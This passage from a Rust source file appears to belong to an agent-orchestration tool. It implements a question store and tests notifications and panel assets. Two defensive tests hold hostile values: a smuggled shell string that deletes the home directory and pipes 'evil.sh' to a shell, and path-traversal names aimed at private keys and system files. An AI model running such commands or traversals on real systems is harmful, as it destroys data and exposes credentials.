1773 "notification command `{program}` exited with {}: {why}",
1774 out.status
1775 );
1776 }
1777 Ok(())
1778}
1779
1780fn expand(template: &str, run: &str, summary: &str, url: &str) -> String {
1786 let table = [("{summary}", summary), ("{run}", run), ("{url}", url)];
1787 let mut out = String::with_capacity(template.len());
1788 let mut rest = template;
1789 while let Some(at) = rest.find('{') {
1790 out.push_str(&rest[..at]);
1791 let tail = &rest[at..];
1792 match table.iter().find(|(token, _)| tail.starts_with(token)) {
1793 Some((token, value)) => {
1794 out.push_str(value);
1795 rest = &tail[token.len()..];
1796 }
1797 None => {
1798 out.push('{');
1800 rest = &tail[1..];
1801 }
1802 }
1803 }
1804 out.push_str(rest);
1805 out
1806}
1807
1808fn web_url() -> String {
1810 question_url(&std::env::var(WEB_URL_ENV).unwrap_or_default())
1811}
1812
1813fn question_url(base: &str) -> String {
1820 let base = base.trim().trim_end_matches('/');
1821 if base.is_empty() || base.contains('#') {
1822 return base.to_owned();
1823 }
1824 format!("{base}/#/questions")
1825}
1826
1827fn fill_panel(dir: &Path, html: &str, assets: &[(String, &Path)]) -> Result<()> {
1832 let index = dir.join(PANEL_HTML);
1833 std::fs::write(&index, html).with_context(|| format!("write {}", index.display()))?;
1834 for (name, src) in assets {
1835 let dst = dir.join(name);
1836 std::fs::copy(src, &dst)
1837 .with_context(|| format!("copy {} to {}", src.display(), dst.display()))?;
1838 }
1839 Ok(())
1840}
1841
1842fn clear_dir(path: &Path) -> Result<()> {
1847 match std::fs::remove_dir_all(path) {
1848 Ok(()) => Ok(()),
1849 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(()),
1850 Err(e) => Err(e).with_context(|| format!("remove {}", path.display())),
1851 }
1852}
1853
1854fn read_path(path: &Path) -> Result<Question> {
1855 let body = std::fs::read_to_string(path).with_context(|| format!("read {}", path.display()))?;
1856 let q: Question =
1857 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
1858 if q.schema > SCHEMA {
1859 bail!(
1864 "question {} was written by a newer magi (schema {}, this build \
1865 only speaks up to {SCHEMA})",
1866 q.id,
1867 q.schema
1868 );
1869 }
1870 Ok(q)
1871}
1872
1873pub fn short_id(id: &str) -> &str {
1875 short(id)
1876}
1877
1878fn short(id: &str) -> &str {
1879 id.split('-').next_back().unwrap_or(id)
1880}
1881
1882fn new_id() -> String {
1883 let stamp = jiff::Zoned::now().strftime("%Y%m%d-%H%M%S");
1884 let seed = crate::rng::entropy();
1885 format!("{stamp}-{:04x}", (seed ^ (seed >> 32)) & 0xffff)
1886}
1887
1888#[cfg(test)]
1889mod tests {
1890 use super::*;
1891
1892 fn store() -> (tempfile::TempDir, Questions) {
1895 let dir = tempfile::tempdir().unwrap();
1896 let s = Questions::at(dir.path().join("questions"));
1897 (dir, s)
1898 }
1899
1900 #[test]
1901 fn run_names_task_only_for_task_questions() {
1902 for (node, want) in [
1903 (crate::conduct::NODE, true),
1904 (crate::triage::NODE, true),
1905 (crate::triage::DEPS_NODE, true),
1906 (crate::land::APPROVAL_NODE, false),
1907 (crate::bump::NOTICE_NODE, false),
1908 ("implement", false),
1909 ] {
1910 let mut q = choice_question();
1911 q.node = node.to_owned();
1912 assert_eq!(q.run_names_task(), want, "{node}");
1913 }
1914 }
1915
1916 #[test]
1917 fn deleting_a_run_stops_its_questions_asking() {
1918 let (_dir, store) = store();
1919
1920 let mut open_one = choice_question();
1921 store.put(&mut open_one).unwrap();
1922 let mut answered = free_question();
1923 answered
1924 .answer(Answer::Text("keep this".to_owned()))
1925 .unwrap();
1926 store.put(&mut answered).unwrap();
1927 let mut elsewhere = choice_question();
1928 elsewhere.run = "20260903-105039-3cbf".to_owned();
1929 store.put(&mut elsewhere).unwrap();
1930
1931 let n = store
1932 .abandon_for_run(&open_one.run, "run was deleted")
1933 .unwrap();
1934 assert_eq!(n, 1, "only the open question of that run");
1935
1936 let back = store.get(&open_one.id).unwrap();
1937 assert!(!back.status.open(), "it no longer asks for a decision");
1938 assert!(
1939 back.detail.contains("run was deleted"),
1940 "the operator can see why: {}",
1941 back.detail
1942 );
1943
1944 let kept = store.get(&answered.id).unwrap();
1945 assert_eq!(
1946 kept.status,
1947 QuestionStatus::Answered,
1948 "an answered question is a decision on record, not something to revoke"
1949 );
1950 assert!(
1951 store.get(&elsewhere.id).unwrap().status.open(),
1952 "another run's question is untouched"
1953 );
1954 assert!(store.open_for(&open_one.run).is_empty());
1955 }
1956
1957 #[test]
1958 fn settle_run_abandons_only_for_a_status_that_is_not_resumable() {
1959 let (_dir, store) = store();
1960 let mut q = choice_question();
1961 store.put(&mut q).unwrap();
1962
1963 let n = store.settle_run(&q.run, RunStatus::Blocked).unwrap();
1965 assert_eq!(n, 0);
1966 assert!(store.get(&q.id).unwrap().status.open());
1967
1968 let n = store.settle_run(&q.run, RunStatus::Failed).unwrap();
1971 assert_eq!(n, 1);
1972 let back = store.get(&q.id).unwrap();
1973 assert!(!back.status.open());
1974 assert!(back.detail.contains(&q.run) && back.detail.contains("failed"));
1975
1976 assert_eq!(store.settle_run(&q.run, RunStatus::Failed).unwrap(), 0);
1978 }
1979
1980 fn choice_question() -> Question {
1981 Question::new(
1982 "20260902-201256-9fb7".to_owned(),
1983 "implement".to_owned(),
1984 "impl-A".to_owned(),
1985 "Which storage backend should the cache use?".to_owned(),
1986 "Both are already dependencies.".to_owned(),
1987 vec!["SQLite".to_owned(), "Redis".to_owned()],
1988 )
1989 }
1990
1991 fn free_question() -> Question {
1992 Question::new(
1993 "20260902-201256-9fb7".to_owned(),
1994 "review".to_owned(),
1995 "rev-1".to_owned(),
1996 "What should the error message say?".to_owned(),
1997 String::new(),
1998 Vec::new(),
1999 )
2000 }
2001
2002 fn quiet() -> config::Notify {
2004 config::Notify::default()
2005 }
2006
2007 #[test]
2008 fn the_stored_json_is_the_shape_the_web_ui_was_written_against() {
2009 let mut q = choice_question();
2013 q.id = "20260902-231501-ab12".to_owned();
2014 let open: serde_json::Value = serde_json::to_value(&q).unwrap();
2015 let keys: Vec<&str> = open
2019 .as_object()
2020 .unwrap()
2021 .keys()
2022 .map(String::as_str)
2023 .collect();
2024 assert_eq!(
2025 keys,
2026 [
2027 "actions",
2028 "answer",
2029 "answer_delivered",
2030 "answer_timeout",
2031 "answered_at",
2032 "asked_at",
2033 "assets",
2034 "choices",
2035 "cwd",
2036 "delivered_turns",
2037 "deputy",
2038 "detail",
2039 "id",
2040 "node",
2041 "panel",
2042 "run",
2043 "schema",
2044 "seat",
2045 "status",
2046 "summary",
2047 "thread",
2048 "waiter",
2049 ],
2050 "the on-disk field set is a contract with the front end"
2051 );
2052 assert_eq!(open["schema"], 5);
2053 assert_eq!(open["thread"], serde_json::json!([]));
2054 assert_eq!(open["id"], "20260902-231501-ab12");
2055 assert_eq!(open["run"], "20260902-201256-9fb7");
2056 assert_eq!(open["node"], "implement");
2057 assert_eq!(open["seat"], "impl-A");
2058 assert_eq!(open["status"], "open");
2059 assert_eq!(open["choices"], serde_json::json!(["SQLite", "Redis"]));
2060 assert_eq!(open["answered_at"], serde_json::Value::Null);
2061 assert_eq!(open["answer"], serde_json::Value::Null);
2062 let asked = open["asked_at"].as_str().unwrap();
2063 assert!(
2064 asked.ends_with('Z') && asked.contains('T'),
2065 "timestamps are UTC RFC 3339, which is what `new Date()` parses: {asked}"
2066 );
2067
2068 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2070 let answered = serde_json::to_value(&q).unwrap();
2071 assert_eq!(answered["status"], "answered");
2072 assert_eq!(answered["answer"], serde_json::json!({"choice": "SQLite"}));
2073 assert!(answered["answered_at"].is_string());
2074
2075 let mut free = free_question();
2077 free.answer(Answer::Text("Say which file it was".to_owned()))
2078 .unwrap();
2079 assert_eq!(
2080 serde_json::to_value(&free).unwrap()["answer"],
2081 serde_json::json!({"text": "Say which file it was"})
2082 );
2083
2084 let body = serde_json::to_string(&q).unwrap();
2086 assert_eq!(serde_json::from_str::<Question>(&body).unwrap(), q);
2087 }
2088
2089 #[test]
2090 fn an_answer_the_question_never_offered_is_refused_with_its_own_reason() {
2091 let mut unoffered = choice_question();
2094 let a = unoffered
2095 .answer(Answer::Choice("Postgres".to_owned()))
2096 .unwrap_err()
2097 .to_string();
2098
2099 let mut typed = choice_question();
2100 let b = typed
2101 .answer(Answer::Text("use Postgres".to_owned()))
2102 .unwrap_err()
2103 .to_string();
2104
2105 let mut blank = free_question();
2106 let c = blank
2107 .answer(Answer::Text(" \n".to_owned()))
2108 .unwrap_err()
2109 .to_string();
2110
2111 let mut twice = choice_question();
2112 twice.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2113 let d = twice
2114 .answer(Answer::Choice("Redis".to_owned()))
2115 .unwrap_err()
2116 .to_string();
2117
2118 assert!(a.contains("not one of the choices"), "{a}");
2119 assert!(b.contains("multiple choice"), "{b}");
2120 assert!(c.contains("empty"), "{c}");
2121 assert!(d.contains("already answered"), "{d}");
2122 let mut distinct = vec![a, b, c, d];
2123 let asked = distinct.len();
2124 distinct.sort_unstable();
2125 distinct.dedup();
2126 assert_eq!(distinct.len(), asked, "each rejection is distinguishable");
2127
2128 assert_eq!(unoffered.status, QuestionStatus::Open);
2130 assert_eq!(typed.status, QuestionStatus::Open);
2131 assert_eq!(blank.status, QuestionStatus::Open);
2132 assert_eq!(twice.resolution().as_deref(), Some("SQLite"));
2134
2135 let mut free = free_question();
2137 let e = free
2138 .answer(Answer::Choice("SQLite".to_owned()))
2139 .unwrap_err()
2140 .to_string();
2141 assert!(e.contains("free text"), "{e}");
2142 }
2143
2144 #[test]
2145 fn open_questions_are_listed_before_answered_ones() {
2146 let (_dir, s) = store();
2147 let mut old_open = choice_question();
2150 old_open.id = "20260101-000001-aaaa".to_owned();
2151 let mut new_open = choice_question();
2152 new_open.id = "20260101-000002-bbbb".to_owned();
2153 let mut answered = choice_question();
2154 answered.id = "20260101-000003-cccc".to_owned();
2155 answered.answer(Answer::Choice("Redis".to_owned())).unwrap();
2156 for q in [&mut old_open, &mut new_open, &mut answered] {
2157 s.put(q).unwrap();
2158 }
2159
2160 let ids: Vec<String> = s.list().into_iter().map(|q| q.id).collect();
2161 assert_eq!(
2162 ids,
2163 [
2164 "20260101-000002-bbbb",
2165 "20260101-000001-aaaa",
2166 "20260101-000003-cccc"
2167 ],
2168 "what has stopped work comes first; history sorts underneath"
2169 );
2170 assert_eq!(s.count_open(), 2);
2171 assert_eq!(s.open_for("20260902-201256-9fb7").len(), 2);
2172 assert!(s.open_for("some-other-run").is_empty());
2173 assert_eq!(s.resolve_id("bbbb").unwrap(), "20260101-000002-bbbb");
2175 assert!(s.get("20260101-000002-bbbb").is_ok());
2176 assert!(s.resolve_id("nope").is_err());
2177 assert!(
2178 s.revision() > 0,
2179 "the store's mtime drives the phone's polling"
2180 );
2181 }
2182
2183 #[test]
2184 fn a_question_file_magi_cannot_read_does_not_take_the_listing_down() {
2185 let (_dir, s) = store();
2186 let mut good = choice_question();
2187 s.put(&mut good).unwrap();
2188 std::fs::write(s.path_of("20260101-000009-dead"), "{\"schema\": 1, \"id\"").unwrap();
2190 let future = serde_json::json!({
2191 "schema": 99, "id": "20260101-000010-beef", "run": "r", "node": "n",
2192 "seat": "s", "summary": "?", "detail": "", "choices": [],
2193 "status": "open", "asked_at": "2026-01-01T00:00:00Z",
2194 "answered_at": null, "answer": null,
2195 });
2196 std::fs::write(
2197 s.path_of("20260101-000010-beef"),
2198 serde_json::to_string(&future).unwrap(),
2199 )
2200 .unwrap();
2201
2202 let listed = s.list();
2203 assert_eq!(listed.len(), 1, "one bad file must not hide the open one");
2204 assert_eq!(listed[0].id, good.id);
2205 let e = s.get("20260101-000010-beef").unwrap_err().to_string();
2207 assert!(e.contains("schema"), "{e}");
2208 }
2209
2210 #[tokio::test]
2211 async fn the_wait_returns_the_answer_another_process_wrote() {
2212 let (dir, s) = store();
2217 let mut q = choice_question();
2218 let id = q.id.clone();
2219 let writer = Questions::at(dir.path().join("questions"));
2220 let handle = tokio::spawn(async move {
2221 tokio::time::sleep(Duration::from_millis(30)).await;
2222 let mut fresh = writer.get(&id).expect("the question was filed first");
2223 fresh.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2224 writer.put(&mut fresh).unwrap();
2225 });
2226
2227 let got = wait_for_owner(
2228 &mut q,
2229 &s,
2230 &quiet(),
2231 Duration::from_secs(5),
2232 Duration::from_millis(10),
2233 )
2234 .await
2235 .unwrap();
2236
2237 handle.await.unwrap();
2238 assert_eq!(got, Wait::Answered("SQLite".to_owned()));
2239 assert_eq!(
2240 q.status,
2241 QuestionStatus::Answered,
2242 "the caller's copy is refreshed from the answering process's record"
2243 );
2244 assert!(q.answered_at.is_some());
2245 }
2246
2247 #[tokio::test]
2248 async fn a_question_nobody_answers_is_abandoned_not_deleted() {
2249 let (_dir, s) = store();
2250 let mut q = choice_question();
2251
2252 let got = wait_for_owner(
2253 &mut q,
2254 &s,
2255 &quiet(),
2256 Duration::from_millis(60),
2257 Duration::from_millis(10),
2258 )
2259 .await
2260 .unwrap();
2261
2262 assert_eq!(
2263 got,
2264 Wait::Abandoned,
2265 "a slow human is not an error; the run parks"
2266 );
2267 assert_eq!(q.status, QuestionStatus::Abandoned);
2268 let on_disk = s.get(&q.id).expect("the record of what was asked survives");
2269 assert_eq!(on_disk.status, QuestionStatus::Abandoned);
2270 assert!(
2271 on_disk.detail.contains("Abandoned:"),
2272 "why nobody answered belongs with the question: {}",
2273 on_disk.detail
2274 );
2275 assert!(on_disk.resolution().is_none());
2276 assert_eq!(s.count_open(), 0);
2277 }
2278
2279 #[tokio::test]
2280 async fn a_slice_running_out_leaves_the_question_open_rather_than_abandoning_it() {
2281 let (_dir, s) = store();
2286 let mut q = choice_question();
2287 s.put(&mut q).unwrap();
2288
2289 let got = wait_loop(
2290 &mut q,
2291 &s,
2292 Duration::from_secs(3600),
2293 Duration::from_millis(30),
2294 Duration::from_millis(10),
2295 )
2296 .await
2297 .unwrap();
2298
2299 assert_eq!(
2300 got,
2301 Wait::Pending,
2302 "the clock on this call ran out, not the owner's patience"
2303 );
2304 assert_eq!(
2305 q.status,
2306 QuestionStatus::Open,
2307 "a slice expiring must never abandon the question"
2308 );
2309 let on_disk = s.get(&q.id).expect("still on disk, still open");
2310 assert_eq!(
2311 on_disk.status,
2312 QuestionStatus::Open,
2313 "nothing about the record changed just because this call gave up"
2314 );
2315 }
2316
2317 #[tokio::test]
2318 async fn a_wait_resumed_after_a_slice_sees_the_answer_the_first_slice_missed() {
2319 let (dir, s) = store();
2324 let mut q = choice_question();
2325 s.put(&mut q).unwrap();
2326
2327 let first = wait_loop(
2328 &mut q,
2329 &s,
2330 Duration::from_secs(3600),
2331 Duration::from_millis(30),
2332 Duration::from_millis(10),
2333 )
2334 .await
2335 .unwrap();
2336 assert_eq!(first, Wait::Pending);
2337
2338 let id = q.id.clone();
2339 let writer = Questions::at(dir.path().join("questions"));
2340 let mut fresh = writer.get(&id).unwrap();
2341 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2342 writer.put(&mut fresh).unwrap();
2343
2344 let second = resume_wait(&mut q, &s, Duration::from_millis(500))
2349 .await
2350 .unwrap();
2351 assert_eq!(second, Wait::Answered("Redis".to_owned()));
2352 assert_eq!(q.status, QuestionStatus::Answered);
2353 }
2354
2355 #[tokio::test]
2356 async fn a_reply_left_in_the_gap_before_a_resumed_wait_starts_is_never_missed() {
2357 let (dir, s) = store();
2367 let mut q = choice_question();
2368 s.put(&mut q).unwrap();
2369
2370 let first = wait_loop(
2371 &mut q,
2372 &s,
2373 Duration::from_secs(3600),
2374 Duration::from_millis(30),
2375 Duration::from_millis(10),
2376 )
2377 .await
2378 .unwrap();
2379 assert_eq!(first, Wait::Pending);
2380
2381 let id = q.id.clone();
2383 let writer = Questions::at(dir.path().join("questions"));
2384 let mut fresh = writer.get(&id).unwrap();
2385 fresh.say("why not Postgres?").unwrap();
2386 writer.put(&mut fresh).unwrap();
2387
2388 let mut resumed = s.get(&id).unwrap();
2392 let second = resume_wait(&mut resumed, &s, Duration::from_millis(500))
2393 .await
2394 .unwrap();
2395 assert_eq!(second, Wait::Replied("why not Postgres?".to_owned()));
2396 assert_eq!(
2397 resumed.status,
2398 QuestionStatus::Open,
2399 "talking back is not a decision; the question stays open"
2400 );
2401 }
2402
2403 #[tokio::test]
2404 async fn a_notification_that_cannot_run_does_not_cost_the_answer() {
2405 let (dir, s) = store();
2409 let broken = config::Notify {
2410 command: vec![
2411 "magi-notifier-that-does-not-exist-9fb7".to_owned(),
2412 "{summary}".to_owned(),
2413 ],
2414 };
2415 let mut q = choice_question();
2416 assert!(
2417 notify(&broken, &q).await.is_err(),
2418 "the caller is told; it decides that it does not matter"
2419 );
2420
2421 let id = q.id.clone();
2422 let writer = Questions::at(dir.path().join("questions"));
2423 let handle = tokio::spawn(async move {
2424 tokio::time::sleep(Duration::from_millis(30)).await;
2425 let mut fresh = writer.get(&id).unwrap();
2426 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2427 writer.put(&mut fresh).unwrap();
2428 });
2429 let got = wait_for_owner(
2430 &mut q,
2431 &s,
2432 &broken,
2433 Duration::from_secs(5),
2434 Duration::from_millis(10),
2435 )
2436 .await
2437 .unwrap();
2438 handle.await.unwrap();
2439 assert_eq!(got, Wait::Answered("Redis".to_owned()));
2440
2441 assert!(notify(&quiet(), &q).await.is_ok());
2443 assert!(notify_text(&quiet(), "run", "text").await.is_ok());
2444 }
2445
2446 #[test]
2447 fn notification_arguments_are_substituted_and_never_a_shell_string() {
2448 let mut q = choice_question();
2449 q.summary = "; rm -rf ~ && curl evil.sh | sh #".to_owned();
2450 let template = [
2451 "ntfy".to_owned(),
2452 "publish".to_owned(),
2453 "--click".to_owned(),
2454 "{url}".to_owned(),
2455 "--title".to_owned(),
2456 "magi {run} needs you".to_owned(),
2457 "{summary}".to_owned(),
2458 ];
2459 let argv: Vec<String> = template
2460 .iter()
2461 .map(|a| expand(a, &q.run, &q.summary, "http://100.64.0.1:7777/#/questions"))
2462 .collect();
2463
2464 assert_eq!(
2465 argv,
2466 [
2467 "ntfy",
2468 "publish",
2469 "--click",
2470 "http://100.64.0.1:7777/#/questions",
2471 "--title",
2472 "magi 20260902-201256-9fb7 needs you",
2473 "; rm -rf ~ && curl evil.sh | sh #",
2474 ],
2475 "the shell metacharacters are one argument's contents, not syntax"
2476 );
2477
2478 q.summary = "should {url} be configurable?".to_owned();
2481 assert_eq!(
2482 expand("{summary}", &q.run, &q.summary, "http://x/#/questions"),
2483 "should {url} be configurable?"
2484 );
2485 assert_eq!(
2487 expand("{title}: {run}", &q.run, &q.summary, ""),
2488 "{title}: 20260902-201256-9fb7"
2489 );
2490 assert_eq!(
2491 expand("no placeholders", &q.run, &q.summary, "http://x"),
2492 "no placeholders"
2493 );
2494 }
2495
2496 #[test]
2497 fn the_notification_link_lands_on_the_view_that_can_answer() {
2498 assert_eq!(
2499 question_url("http://100.64.0.1:7777"),
2500 "http://100.64.0.1:7777/#/questions"
2501 );
2502 assert_eq!(
2503 question_url("http://100.64.0.1:7777/"),
2504 "http://100.64.0.1:7777/#/questions"
2505 );
2506 assert_eq!(
2508 question_url("http://magi.ts.net/#/runs"),
2509 "http://magi.ts.net/#/runs"
2510 );
2511 assert_eq!(question_url(" "), "");
2513 }
2514
2515 fn panelled() -> Question {
2517 let mut q = choice_question();
2518 q.id = "20260903-014455-ab12".to_owned();
2519 q
2520 }
2521
2522 #[test]
2523 fn a_panel_round_trips_verbatim_with_its_assets_listed_sorted() {
2524 let (dir, s) = store();
2525 let work = dir.path().join("worktree");
2526 std::fs::create_dir_all(&work).unwrap();
2527 std::fs::write(work.join("diff.svg"), "<svg/>").unwrap();
2528 std::fs::write(work.join("table.png"), b"\x89PNG").unwrap();
2529
2530 let mut q = panelled();
2531 let html = "<h1>Merge?</h1>\n<img src=\"asset/diff.svg\">\n";
2532 s.put_panel(
2533 &mut q,
2534 html,
2535 &[work.join("table.png"), work.join("diff.svg")],
2536 )
2537 .unwrap();
2538 s.put(&mut q).unwrap();
2539
2540 assert!(q.panel);
2541 assert_eq!(
2542 q.assets,
2543 ["diff.svg", "table.png"],
2544 "sorted, not in the order the agent happened to pass them"
2545 );
2546 assert_eq!(
2547 s.panel_html(&q.id).as_deref(),
2548 Some(html),
2549 "the html is stored byte for byte; the agent authored the markup"
2550 );
2551 assert_eq!(
2552 s.panel_asset(&q.id, "diff.svg").unwrap().as_deref(),
2553 Some(&b"<svg/>"[..])
2554 );
2555
2556 let body = std::fs::read_to_string(s.path_of(&q.id)).unwrap();
2558 let json: serde_json::Value = serde_json::from_str(&body).unwrap();
2559 assert_eq!(json["panel"], true);
2560 assert_eq!(json["assets"], serde_json::json!(["diff.svg", "table.png"]));
2561 let back = s.get(&q.id).unwrap();
2562 assert!(back.panel);
2563 assert_eq!(back.assets, q.assets);
2564
2565 std::fs::remove_dir_all(&work).unwrap();
2568 assert_eq!(
2569 s.panel_asset(&q.id, "table.png").unwrap().as_deref(),
2570 Some(&b"\x89PNG"[..]),
2571 "a referenced asset would be gone with the worktree"
2572 );
2573 }
2574
2575 #[test]
2576 fn a_traversal_asset_name_is_refused_before_the_filesystem_is_touched() {
2577 let (dir, s) = store();
2578 let mut q = panelled();
2579 s.put_panel(&mut q, "<p>ok</p>", &[]).unwrap();
2580 s.put(&mut q).unwrap();
2581
2582 let secret = "this must never reach the browser";
2585 std::fs::write(s.root().join("id_rsa"), secret).unwrap();
2586 assert_eq!(
2587 std::fs::read_to_string(s.panel_dir(&q.id).join("../id_rsa")).unwrap(),
2588 secret,
2589 "the traversal is real: the operating system resolves this path \
2590 happily, which is why the name has to be refused before the join"
2591 );
2592
2593 let long = "x".repeat(200);
2594 for name in [
2595 "..",
2596 "../id_rsa",
2597 "..\\id_rsa",
2598 "sub/../id_rsa",
2599 "/",
2600 "\\",
2601 "/etc/passwd",
2602 "C:\\Windows\\win.ini",
2603 "",
2604 ".hidden",
2605 ".",
2606 long.as_str(),
2607 ] {
2608 assert!(!valid_asset_name(name), "`{name}` must fail the pattern");
2609 let e = s.panel_asset(&q.id, name).unwrap_err().to_string();
2610 assert!(
2611 e.contains("not a panel file name"),
2612 "`{name}` must be refused as a name, not attempted: {e}"
2613 );
2614 assert!(!e.contains(secret), "`{name}` reached the filesystem: {e}");
2615 }
2616 assert!(s.panel_asset(&q.id, "index.html").unwrap().is_some());
2619
2620 let hidden = dir.path().join(".hidden");
2623 std::fs::write(&hidden, "x").unwrap();
2624 let e = s
2625 .put_panel(&mut q, "<p>replacement</p>", &[hidden])
2626 .unwrap_err()
2627 .to_string();
2628 assert!(e.contains(".hidden") && e.contains("A-Za-z0-9"), "{e}");
2629 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>ok</p>"));
2630 assert!(q.assets.is_empty());
2631 }
2632
2633 #[test]
2634 fn the_panel_size_cap_refuses_an_oversized_asset_set_and_writes_nothing() {
2635 let (dir, s) = store();
2636 let mut q = panelled();
2637 s.put(&mut q).unwrap();
2638
2639 let big = dir.path().join("recording.png");
2642 std::fs::File::create(&big)
2643 .unwrap()
2644 .set_len(PANEL_MAX_BYTES)
2645 .unwrap();
2646
2647 let html = "<p>see the recording</p>";
2648 let total = PANEL_MAX_BYTES + html.len() as u64;
2649 let e = s.put_panel(&mut q, html, &[big]).unwrap_err().to_string();
2650 assert!(
2651 e.contains(&PANEL_MAX_BYTES.to_string()),
2652 "the cap is named so the agent knows the limit: {e}"
2653 );
2654 assert!(
2655 e.contains(&total.to_string()),
2656 "the actual size is named so the agent knows by how much: {e}"
2657 );
2658
2659 assert!(!q.panel);
2660 assert!(q.assets.is_empty());
2661 let left: Vec<String> = std::fs::read_dir(s.root())
2662 .unwrap()
2663 .map(|e| e.unwrap().file_name().to_string_lossy().into_owned())
2664 .collect();
2665 assert_eq!(
2666 left,
2667 [format!("{}.json", q.id)],
2668 "a refused panel leaves neither a directory nor scratch: {left:?}"
2669 );
2670 }
2671
2672 #[test]
2673 fn two_assets_sharing_a_base_name_are_refused_rather_than_one_hiding_the_other() {
2674 let (dir, s) = store();
2675 let (before, after) = (dir.path().join("before"), dir.path().join("after"));
2676 std::fs::create_dir_all(&before).unwrap();
2677 std::fs::create_dir_all(&after).unwrap();
2678 std::fs::write(before.join("diff.png"), "before").unwrap();
2679 std::fs::write(after.join("diff.png"), "after").unwrap();
2680
2681 let mut q = panelled();
2682 let e = s
2683 .put_panel(
2684 &mut q,
2685 "<p>x</p>",
2686 &[before.join("diff.png"), after.join("diff.png")],
2687 )
2688 .unwrap_err()
2689 .to_string();
2690 assert!(e.contains("diff.png"), "{e}");
2691 assert!(
2692 e.contains("before") && e.contains("after"),
2693 "both sources are named, because the fix is to rename one: {e}"
2694 );
2695 assert!(!q.panel);
2696 assert!(!s.panel_dir(&q.id).exists());
2697 }
2698
2699 #[test]
2700 fn storing_a_panel_twice_replaces_it_rather_than_merging_two_attempts() {
2701 let (dir, s) = store();
2702 std::fs::write(dir.path().join("old.png"), "old").unwrap();
2703 std::fs::write(dir.path().join("new.png"), "new").unwrap();
2704
2705 let mut q = panelled();
2706 s.put_panel(&mut q, "<p>first</p>", &[dir.path().join("old.png")])
2707 .unwrap();
2708 s.put_panel(&mut q, "<p>second</p>", &[dir.path().join("new.png")])
2709 .unwrap();
2710
2711 assert_eq!(q.assets, ["new.png"]);
2712 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>second</p>"));
2713 assert!(
2714 s.panel_asset(&q.id, "old.png").unwrap().is_none(),
2715 "an asset from the first attempt would show a mix of two answers"
2716 );
2717
2718 s.drop_panel(&q.id).unwrap();
2719 assert!(s.panel_html(&q.id).is_none());
2720 assert!(!s.panel_dir(&q.id).exists());
2721 s.drop_panel(&q.id)
2722 .expect("dropping a panel that is already gone is the desired state");
2723 }
2724
2725 #[test]
2726 fn a_question_with_no_panel_reports_none_rather_than_an_error() {
2727 let (_dir, s) = store();
2728 let mut q = panelled();
2729 s.put(&mut q).unwrap();
2730
2731 assert!(!q.panel);
2732 assert!(s.panel_html(&q.id).is_none());
2733 assert!(
2734 s.panel_asset(&q.id, "diff.svg").unwrap().is_none(),
2735 "a missing file is a 404 for the caller, not a failure of the store"
2736 );
2737 let json = serde_json::to_value(&q).unwrap();
2738 assert_eq!(json["panel"], false);
2739 assert_eq!(json["assets"], serde_json::json!([]));
2740
2741 let e = s.put_panel(&mut q, " \n", &[]).unwrap_err().to_string();
2744 assert!(e.contains("empty panel"), "{e}");
2745 assert!(!s.panel_dir(&q.id).exists());
2746 }
2747
2748 #[test]
2749 fn a_question_written_before_panels_existed_still_deserialises() {
2750 let (_dir, s) = store();
2751 std::fs::create_dir_all(s.root()).unwrap();
2752 let id = "20260902-231501-ab12";
2753 let body = r#"{
2755 "schema": 1,
2756 "id": "20260902-231501-ab12",
2757 "run": "20260902-201256-9fb7",
2758 "node": "implement",
2759 "seat": "impl-A",
2760 "summary": "Which storage backend should the cache use?",
2761 "detail": "Both are already dependencies.",
2762 "choices": ["SQLite", "Redis"],
2763 "status": "open",
2764 "asked_at": "2026-09-02T23:15:01Z",
2765 "answered_at": null,
2766 "answer": null
2767}"#;
2768 std::fs::write(s.path_of(id), body).unwrap();
2769
2770 let q = s.get(id).unwrap();
2771 assert!(
2772 !q.panel,
2773 "an absent field means no panel, not a parse error"
2774 );
2775 assert!(q.assets.is_empty());
2776 assert_eq!(q.schema, 1);
2781 assert!(q.thread.is_empty());
2782 assert_eq!(
2783 q.answer_timeout, 0,
2784 "an absent field means unrecorded, not a zero-second deadline"
2785 );
2786 assert!(!q.waiting_on_agent());
2787 assert_eq!(q.summary, "Which storage backend should the cache use?");
2788 assert_eq!(
2789 s.list().len(),
2790 1,
2791 "and it is still listed; skipping it would hide an open question"
2792 );
2793 }
2794
2795 fn turn(who: Who, body: &str, at: Timestamp) -> Turn {
2796 Turn {
2797 who,
2798 body: body.to_owned(),
2799 at,
2800 }
2801 }
2802
2803 #[test]
2804 fn a_turn_round_trips_as_who_body_at_with_two_named_speakers() {
2805 let mut q = choice_question();
2808 q.thread
2809 .push(turn(Who::Operator, "why not Postgres?", Timestamp::now()));
2810 let value = serde_json::to_value(&q.thread[0]).unwrap();
2811 let mut keys: Vec<&str> = value
2812 .as_object()
2813 .unwrap()
2814 .keys()
2815 .map(String::as_str)
2816 .collect();
2817 keys.sort_unstable();
2818 assert_eq!(keys, ["at", "body", "who"]);
2819 assert_eq!(value["who"], "operator");
2820 assert_eq!(value["body"], "why not Postgres?");
2821
2822 let agent_turn = serde_json::json!({"who": "agent", "body": "hi", "at": value["at"]});
2823 let parsed: Turn = serde_json::from_value(agent_turn).unwrap();
2824 assert_eq!(parsed.who, Who::Agent);
2825 }
2826
2827 #[test]
2828 fn a_merge_approval_settles_only_on_a_clear_unhedged_merge() {
2829 let mut q = Question::new(
2830 "run".into(),
2831 crate::land::APPROVAL_NODE.into(),
2832 "land".into(),
2833 "Merge?".into(),
2834 String::new(),
2835 vec!["merge".into(), "hold".into()],
2836 );
2837 let mut dep = Deputy::new("brief".into());
2838 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2839 q.deputy = Some(dep);
2840 q.say("please don't merge yet").unwrap();
2841 assert!(q.settle_by_deputy("deputy-x", "merge", "merge").is_err());
2842 assert!(
2843 q.settle_by_deputy("deputy-x", "merge", "don't merge")
2844 .is_err()
2845 );
2846 assert!(
2847 q.settle_by_deputy("deputy-x", "hold", "don't merge")
2848 .is_err()
2849 );
2850 assert_eq!(q.status, QuestionStatus::Open);
2851 q.reply("do you mean hold?", vec!["merge".into(), "hold".into()])
2852 .unwrap();
2853 q.say(" Merge ").unwrap();
